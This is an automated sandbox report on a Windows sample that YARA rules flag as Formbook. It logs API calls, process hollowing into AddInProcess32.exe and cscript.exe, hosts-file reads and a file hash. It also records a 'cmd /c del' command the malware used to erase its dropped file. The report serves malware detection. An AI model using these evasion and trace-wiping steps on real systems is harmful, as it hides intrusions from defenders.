Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013799D0 NtCreateProcessEx,	1_2_013799D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01379820 NtEnumerateKey,	1_2_01379820
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0137B040 NtSuspendThread,	1_2_0137B040
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013798A0 NtWriteVirtualMemory,	1_2_013798A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01379730 NtQueryVirtualMemory,	1_2_01379730
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0137A710 NtOpenProcessToken,	1_2_0137A710
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01379B00 NtSetValueKey,	1_2_01379B00
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01379770 NtSetInformationFile,	1_2_01379770
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0137A770 NtOpenThread,	1_2_0137A770
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01379760 NtOpenProcess,	1_2_01379760
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0137A3B0 NtGetContextThread,	1_2_0137A3B0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01379FE0 NtCreateMutant,	1_2_01379FE0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01379610 NtEnumerateValueKey,	1_2_01379610
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01379A10 NtQuerySection,	1_2_01379A10
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01379670 NtQueryInformationProcess,	1_2_01379670
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01379650 NtQueryValueKey,	1_2_01379650
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01379A80 NtOpenDirectoryObject,	1_2_01379A80
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013796D0 NtCreateKey,	1_2_013796D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D9540 NtReadFile,LdrInitializeThunk,	7_2_047D9540
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D95D0 NtClose,LdrInitializeThunk,	7_2_047D95D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D9660 NtAllocateVirtualMemory,LdrInitializeThunk,	7_2_047D9660
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D9650 NtQueryValueKey,LdrInitializeThunk,	7_2_047D9650
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D96E0 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_047D96E0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D96D0 NtCreateKey,LdrInitializeThunk,	7_2_047D96D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D9710 NtQueryInformationToken,LdrInitializeThunk,	7_2_047D9710
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D9FE0 NtCreateMutant,LdrInitializeThunk,	7_2_047D9FE0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D9780 NtMapViewOfSection,LdrInitializeThunk,	7_2_047D9780
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D9860 NtQuerySystemInformation,LdrInitializeThunk,	7_2_047D9860
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D9840 NtDelayExecution,LdrInitializeThunk,	7_2_047D9840
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	7_2_047D9910
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D99A0 NtCreateSection,LdrInitializeThunk,	7_2_047D99A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D9A50 NtCreateFile,LdrInitializeThunk,	7_2_047D9A50
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D9560 NtWriteFile,	7_2_047D9560
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047DAD30 NtSetContextThread,	7_2_047DAD30
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D9520 NtWaitForSingleObject,	7_2_047D9520
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D95F0 NtQueryInformationFile,	7_2_047D95F0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D9670 NtQueryInformationProcess,	7_2_047D9670
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D9610 NtEnumerateValueKey,	7_2_047D9610
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047DA770 NtOpenThread,	7_2_047DA770
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D9770 NtSetInformationFile,	7_2_047D9770
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D9760 NtOpenProcess,	7_2_047D9760
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D9730 NtQueryVirtualMemory,	7_2_047D9730
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047DA710 NtOpenProcessToken,	7_2_047DA710
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D97A0 NtUnmapViewOfSection,	7_2_047D97A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047DB040 NtSuspendThread,	7_2_047DB040
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D9820 NtEnumerateKey,	7_2_047D9820
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D98F0 NtReadVirtualMemory,	7_2_047D98F0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D98A0 NtWriteVirtualMemory,	7_2_047D98A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D9950 NtQueueApcThread,	7_2_047D9950
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D99D0 NtCreateProcessEx,	7_2_047D99D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D9A20 NtResumeThread,	7_2_047D9A20
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D9A10 NtQuerySection,	7_2_047D9A10
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D9A00 NtProtectVirtualMemory,	7_2_047D9A00
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D9A80 NtOpenDirectoryObject,	7_2_047D9A80
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D9B00 NtSetValueKey,	7_2_047D9B00
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047DA3B0 NtGetContextThread,	7_2_047DA3B0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_003E9D70 NtCreateFile,	7_2_003E9D70
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_003E9E20 NtReadFile,	7_2_003E9E20
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_003E9EA0 NtClose,	7_2_003E9EA0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_003E9F50 NtAllocateVirtualMemory,	7_2_003E9F50
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_003E9E1A NtReadFile,	7_2_003E9E1A

Detected potential crypto function

Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 0_2_00B7C9A8	0_2_00B7C9A8
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 0_2_00B7EBD2	0_2_00B7EBD2
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 0_2_00B7D4A2	0_2_00B7D4A2
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 0_2_00B76E20	0_2_00B76E20
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 0_2_00B72648	0_2_00B72648
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 0_2_00B767E8	0_2_00B767E8
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 0_2_00B79F20	0_2_00B79F20
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 0_2_069C2790	0_2_069C2790
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 0_2_069C0788	0_2_069C0788
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 0_2_069C85F0	0_2_069C85F0
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 0_2_069CCE38	0_2_069CCE38
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 0_2_069C1F91	0_2_069C1F91
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 0_2_069C2780	0_2_069C2780
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 0_2_069C0778	0_2_069C0778
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 0_2_069CCE28	0_2_069CCE28
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 0_2_069C7C10	0_2_069C7C10
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 0_2_069C7C48	0_2_069C7C48
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_00401030	1_2_00401030
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0041D25B	1_2_0041D25B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_00402D8B	1_2_00402D8B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_00402D90	1_2_00402D90
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_00409E40	1_2_00409E40
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_00402FB0	1_2_00402FB0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_009E2050	1_2_009E2050
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01330D20	1_2_01330D20
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01401D55	1_2_01401D55
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01354120	1_2_01354120
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0133F900	1_2_0133F900
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01402D07	1_2_01402D07
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_014025DD	1_2_014025DD
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01362581	1_2_01362581
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0134D5E0	1_2_0134D5E0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0134841F	1_2_0134841F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013F1002	1_2_013F1002
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013FD466	1_2_013FD466
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013620A0	1_2_013620A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0134B090	1_2_0134B090
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_014028EC	1_2_014028EC
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_014020A8	1_2_014020A8
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01402B28	1_2_01402B28
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0136EBB0	1_2_0136EBB0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01401FF1	1_2_01401FF1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013FDBD2	1_2_013FDBD2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01356E30	1_2_01356E30
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01402EF7	1_2_01402EF7
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_014022AE	1_2_014022AE
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047A841F	7_2_047A841F
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0485D466	7_2_0485D466
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04790D20	7_2_04790D20
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_048625DD	7_2_048625DD
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04862D07	7_2_04862D07
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047AD5E0	7_2_047AD5E0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04861D55	7_2_04861D55
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047C2581	7_2_047C2581
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047B6E30	7_2_047B6E30
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04862EF7	7_2_04862EF7
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0485D616	7_2_0485D616
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0486DFCE	7_2_0486DFCE
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04861FF1	7_2_04861FF1
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_048620A8	7_2_048620A8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_048628EC	7_2_048628EC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04851002	7_2_04851002
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0486E824	7_2_0486E824
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047C20A0	7_2_047C20A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047AB090	7_2_047AB090
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047B4120	7_2_047B4120
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0479F900	7_2_0479F900
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_048622AE	7_2_048622AE
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0485DBD2	7_2_0485DBD2
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_048503DA	7_2_048503DA
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04862B28	7_2_04862B28
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047CEBB0	7_2_047CEBB0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_003D2D90	7_2_003D2D90
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_003D2D8B	7_2_003D2D8B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_003D9E40	7_2_003D9E40
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_003D2FB0	7_2_003D2FB0

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe 23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\cscript.exe	Code function: String function: 0479B150 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: String function: 0133B150 appears 35 times

Sample file is different than original file name gathered from version info

Source: bXFjrxjRlb.exe	Binary or memory string: OriginalFilename vs bXFjrxjRlb.exe
Source: bXFjrxjRlb.exe, 00000000.00000002.359141236.0000000003531000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSHCore1.dll0 vs bXFjrxjRlb.exe
Source: bXFjrxjRlb.exe, 00000000.00000002.356213090.000000000256A000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameRunPe6.dll" vs bXFjrxjRlb.exe
Source: bXFjrxjRlb.exe, 00000000.00000002.360888475.00000000056E0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemscorrc.dllT vs bXFjrxjRlb.exe
Source: bXFjrxjRlb.exe, 00000000.00000002.360416763.0000000004C60000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs bXFjrxjRlb.exe
Source: bXFjrxjRlb.exe, 00000000.00000002.355982660.00000000008CB000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs bXFjrxjRlb.exe
Source: bXFjrxjRlb.exe	Binary or memory string: OriginalFilenameIMG_155710.exeL vs bXFjrxjRlb.exe

Uses 32bit PE files

Source: bXFjrxjRlb.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Yara signature match

Source: 00000000.00000002.359609187.0000000003FE5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.359609187.0000000003FE5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.699879470.00000000003D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.699879470.00000000003D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.401988886.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.401988886.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.359423289.0000000003E79000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.359423289.0000000003E79000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.402861692.0000000001280000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.402861692.0000000001280000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.700544777.0000000000D90000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.700544777.0000000000D90000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.402643394.0000000001250000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.402643394.0000000001250000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.700734017.00000000010F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.700734017.00000000010F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/2@5/3

Source: C:\Users\user\Desktop\bXFjrxjRlb.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\bXFjrxjRlb.exe.log

Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\bXFjrxjRlb.exe 'C:\Users\user\Desktop\bXFjrxjRlb.exe'
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0041781D push ebp; ret	1_2_0041783E
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_00417963 push FFFFFFE1h; iretd	1_2_00417970
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0041712C push es; retf	1_2_00417136
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0041EAB0 pushad ; retf	1_2_0041EAB1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0041E41F push dword ptr [42F9B798h]; ret	1_2_0041E446
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0041CEC5 push eax; ret	1_2_0041CF18
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0041CF7C push eax; ret	1_2_0041CF82
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0041CF12 push eax; ret	1_2_0041CF18
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0041CF1B push eax; ret	1_2_0041CF82
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0138D0D1 push ecx; ret	1_2_0138D0E4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047ED0D1 push ecx; ret	7_2_047ED0E4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_003E781D push ebp; ret	7_2_003E783E
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_003E712C push es; retf	7_2_003E7136
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_003E7963 push FFFFFFE1h; iretd	7_2_003E7970
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_003EEAB0 pushad ; retf	7_2_003EEAB1
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_003EE41F push dword ptr [42F9B798h]; ret	7_2_003EE446
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_003ECEC5 push eax; ret	7_2_003ECF18
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_003ECF1B push eax; ret	7_2_003ECF82
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_003ECF12 push eax; ret	7_2_003ECF18
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_003ECF7C push eax; ret	7_2_003ECF82

Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
